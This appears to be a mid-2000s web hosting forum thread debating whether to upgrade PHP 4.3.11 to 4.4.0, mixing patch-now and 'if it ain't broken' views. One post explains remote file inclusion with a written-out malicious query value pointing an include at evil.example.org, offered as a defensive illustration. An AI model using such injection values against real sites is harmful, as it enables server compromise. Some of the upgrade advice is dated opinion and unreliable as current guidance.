got a question from user that he have been told that php version on my server is very old... uh...php 4.4.0 just come out and from the feedback, it's not worth to upgrade to php 4.4.0 and most web apps doesn't support php5.
why do people want latest that is not stable or widely supported.
BuyHTTP Internet Services - In business since 2003 Business Hosting | nginx, CloudLinux, Varnish cache, and CDP with every business account
Shared, Reseller, Semi Dedicated, VPS, Cloud, Dedicated - We can grow with you
Actually PHP 5 has been released for public use long ago, it's just a discouraging picture of how many apps still don't run on it. AFAIK Apache 2 is still not officially recommended for production sites, but PHP 5 is (correct me if I'm wrong).
Since php.net says for every such security/bugfix release that everyone should update ASAP, it doesn't sound to me like a "customer's whim". For me it's rather the opposite, IMO my customers have every right to accept me to keep crucial system components up to date. Some of the big exploits in scripts like phpBB were PHP version dependent, i.e. when one had the latest PHP version at the point of the exploit, the server was safe from it.
At any rate, on Windows I'm also for the "if it ain't broken, don't fix it" strategy because it's really true, just had to restore a Windows 2003 Server last week because one of the latest small security patches from Windows Update broke just about everything, the computer wasn't working right any more. OTOH on GNU/Linux this is rather unlikely to happen, with commercial addons like cPanel/WHM it happens now and then, but with the core system it's a very rare thing. Years ago when I was mainly using Windows I never patched anything that worked, but after years of having administered GNU/Linux webservers and using Mac OS X at home, I got into the habit of always keeping things on the latest.
Originally posted by RambOrc Actually PHP 5 has been released for public use long ago, it's just a discouraging picture of how many apps still don't run on it. AFAIK Apache 2 is still not officially recommended for production sites, but PHP 5 is (correct me if I'm wrong).
if it ain't broken....you know the old saying and like someone already say 4.3.11 is not that much different from 4.4.0. the security risk is rather very small. software bugs is alway there, it's only the matter of seroiusly bad or minor bad.
in this case 4.4.0 only fix some minor bugs that won't pose much of the threat to the server.
The "it ain't broken" proverb means to me rather that even though Fedora Core 4 is out, I leave a Fedora Core 2 server the way it is, updating it neither to C3 nor to C4. But for me it doesn't mean leaving things unpatched within C2. Same with PHP, 4.4.0 "addresses a serious memory corruption problem" and that's not to be taken lightly IMO.
Originally posted by asbhost What kind of directives are we talking here about? Share with us so that everbody knows.
What i mean is nothing new. You should always disable certain functions you feel they are not safe or you won't need.
Just to give you an example:
Imagine you have this script on your site
With register_globals enabled , this page can be requested with ?path=http%3A%2F%2Fevil.example.org%2F%3F in the query string in order to equate this example to the following:
If allow_url_fopen is enabled (which it is by default), this will include the output of http://evil.example.org/ just as if it were a local file. This is a major security vulnerability, and it is has been used many times.
This is just a basic example of what you need to modify bearing in mind the vulnerabilities discovered. If you get a way of doing this you shouldn't bother to upgrade. Most of the times there's another way round.
The general rule for upgrades is this. There is a VAST difference between the users that user PHP and the people the help develope it.
When they say UPGRADE NOW! All depends on how severe the security fix is. That is up to the interpritation of a skilled php programmer to make that dicision.
A time to upgrade would be if you need to run a script that needs a minimum version that you may not have installed.
Otherwise there is very little reason to upgrade your PHP versions. The reason is this... when a new version comes out sometimes that new version actually INTRODUCES NEW BUGS! So, upgrading right away may screw yourself when you think it was helping...
Sometimes patience is a great virtue... upgrade at Milestone releases or after a while.
Upgrade if your a knowledgable PHP guy and demand that security fix.
Otherwise, stay cool and let the new version "settle a bit" before upgrading right away.
DigiPanel - Web Host Control Panel http://digipanel.com
Offering Free Licenses to ISP's and Hosting Companies!
Last December's big phpBB hack wave where Google was at fault too was partially a result of a PHP security issue, which could be fixed with a PHP version (4.3.9 or 10 I think) that was released some time previously. Sysadmins who went with the "if it ain't broken, don't fix it" proverb spent quite a lot of time with restoring accounts and dealing with user complaints.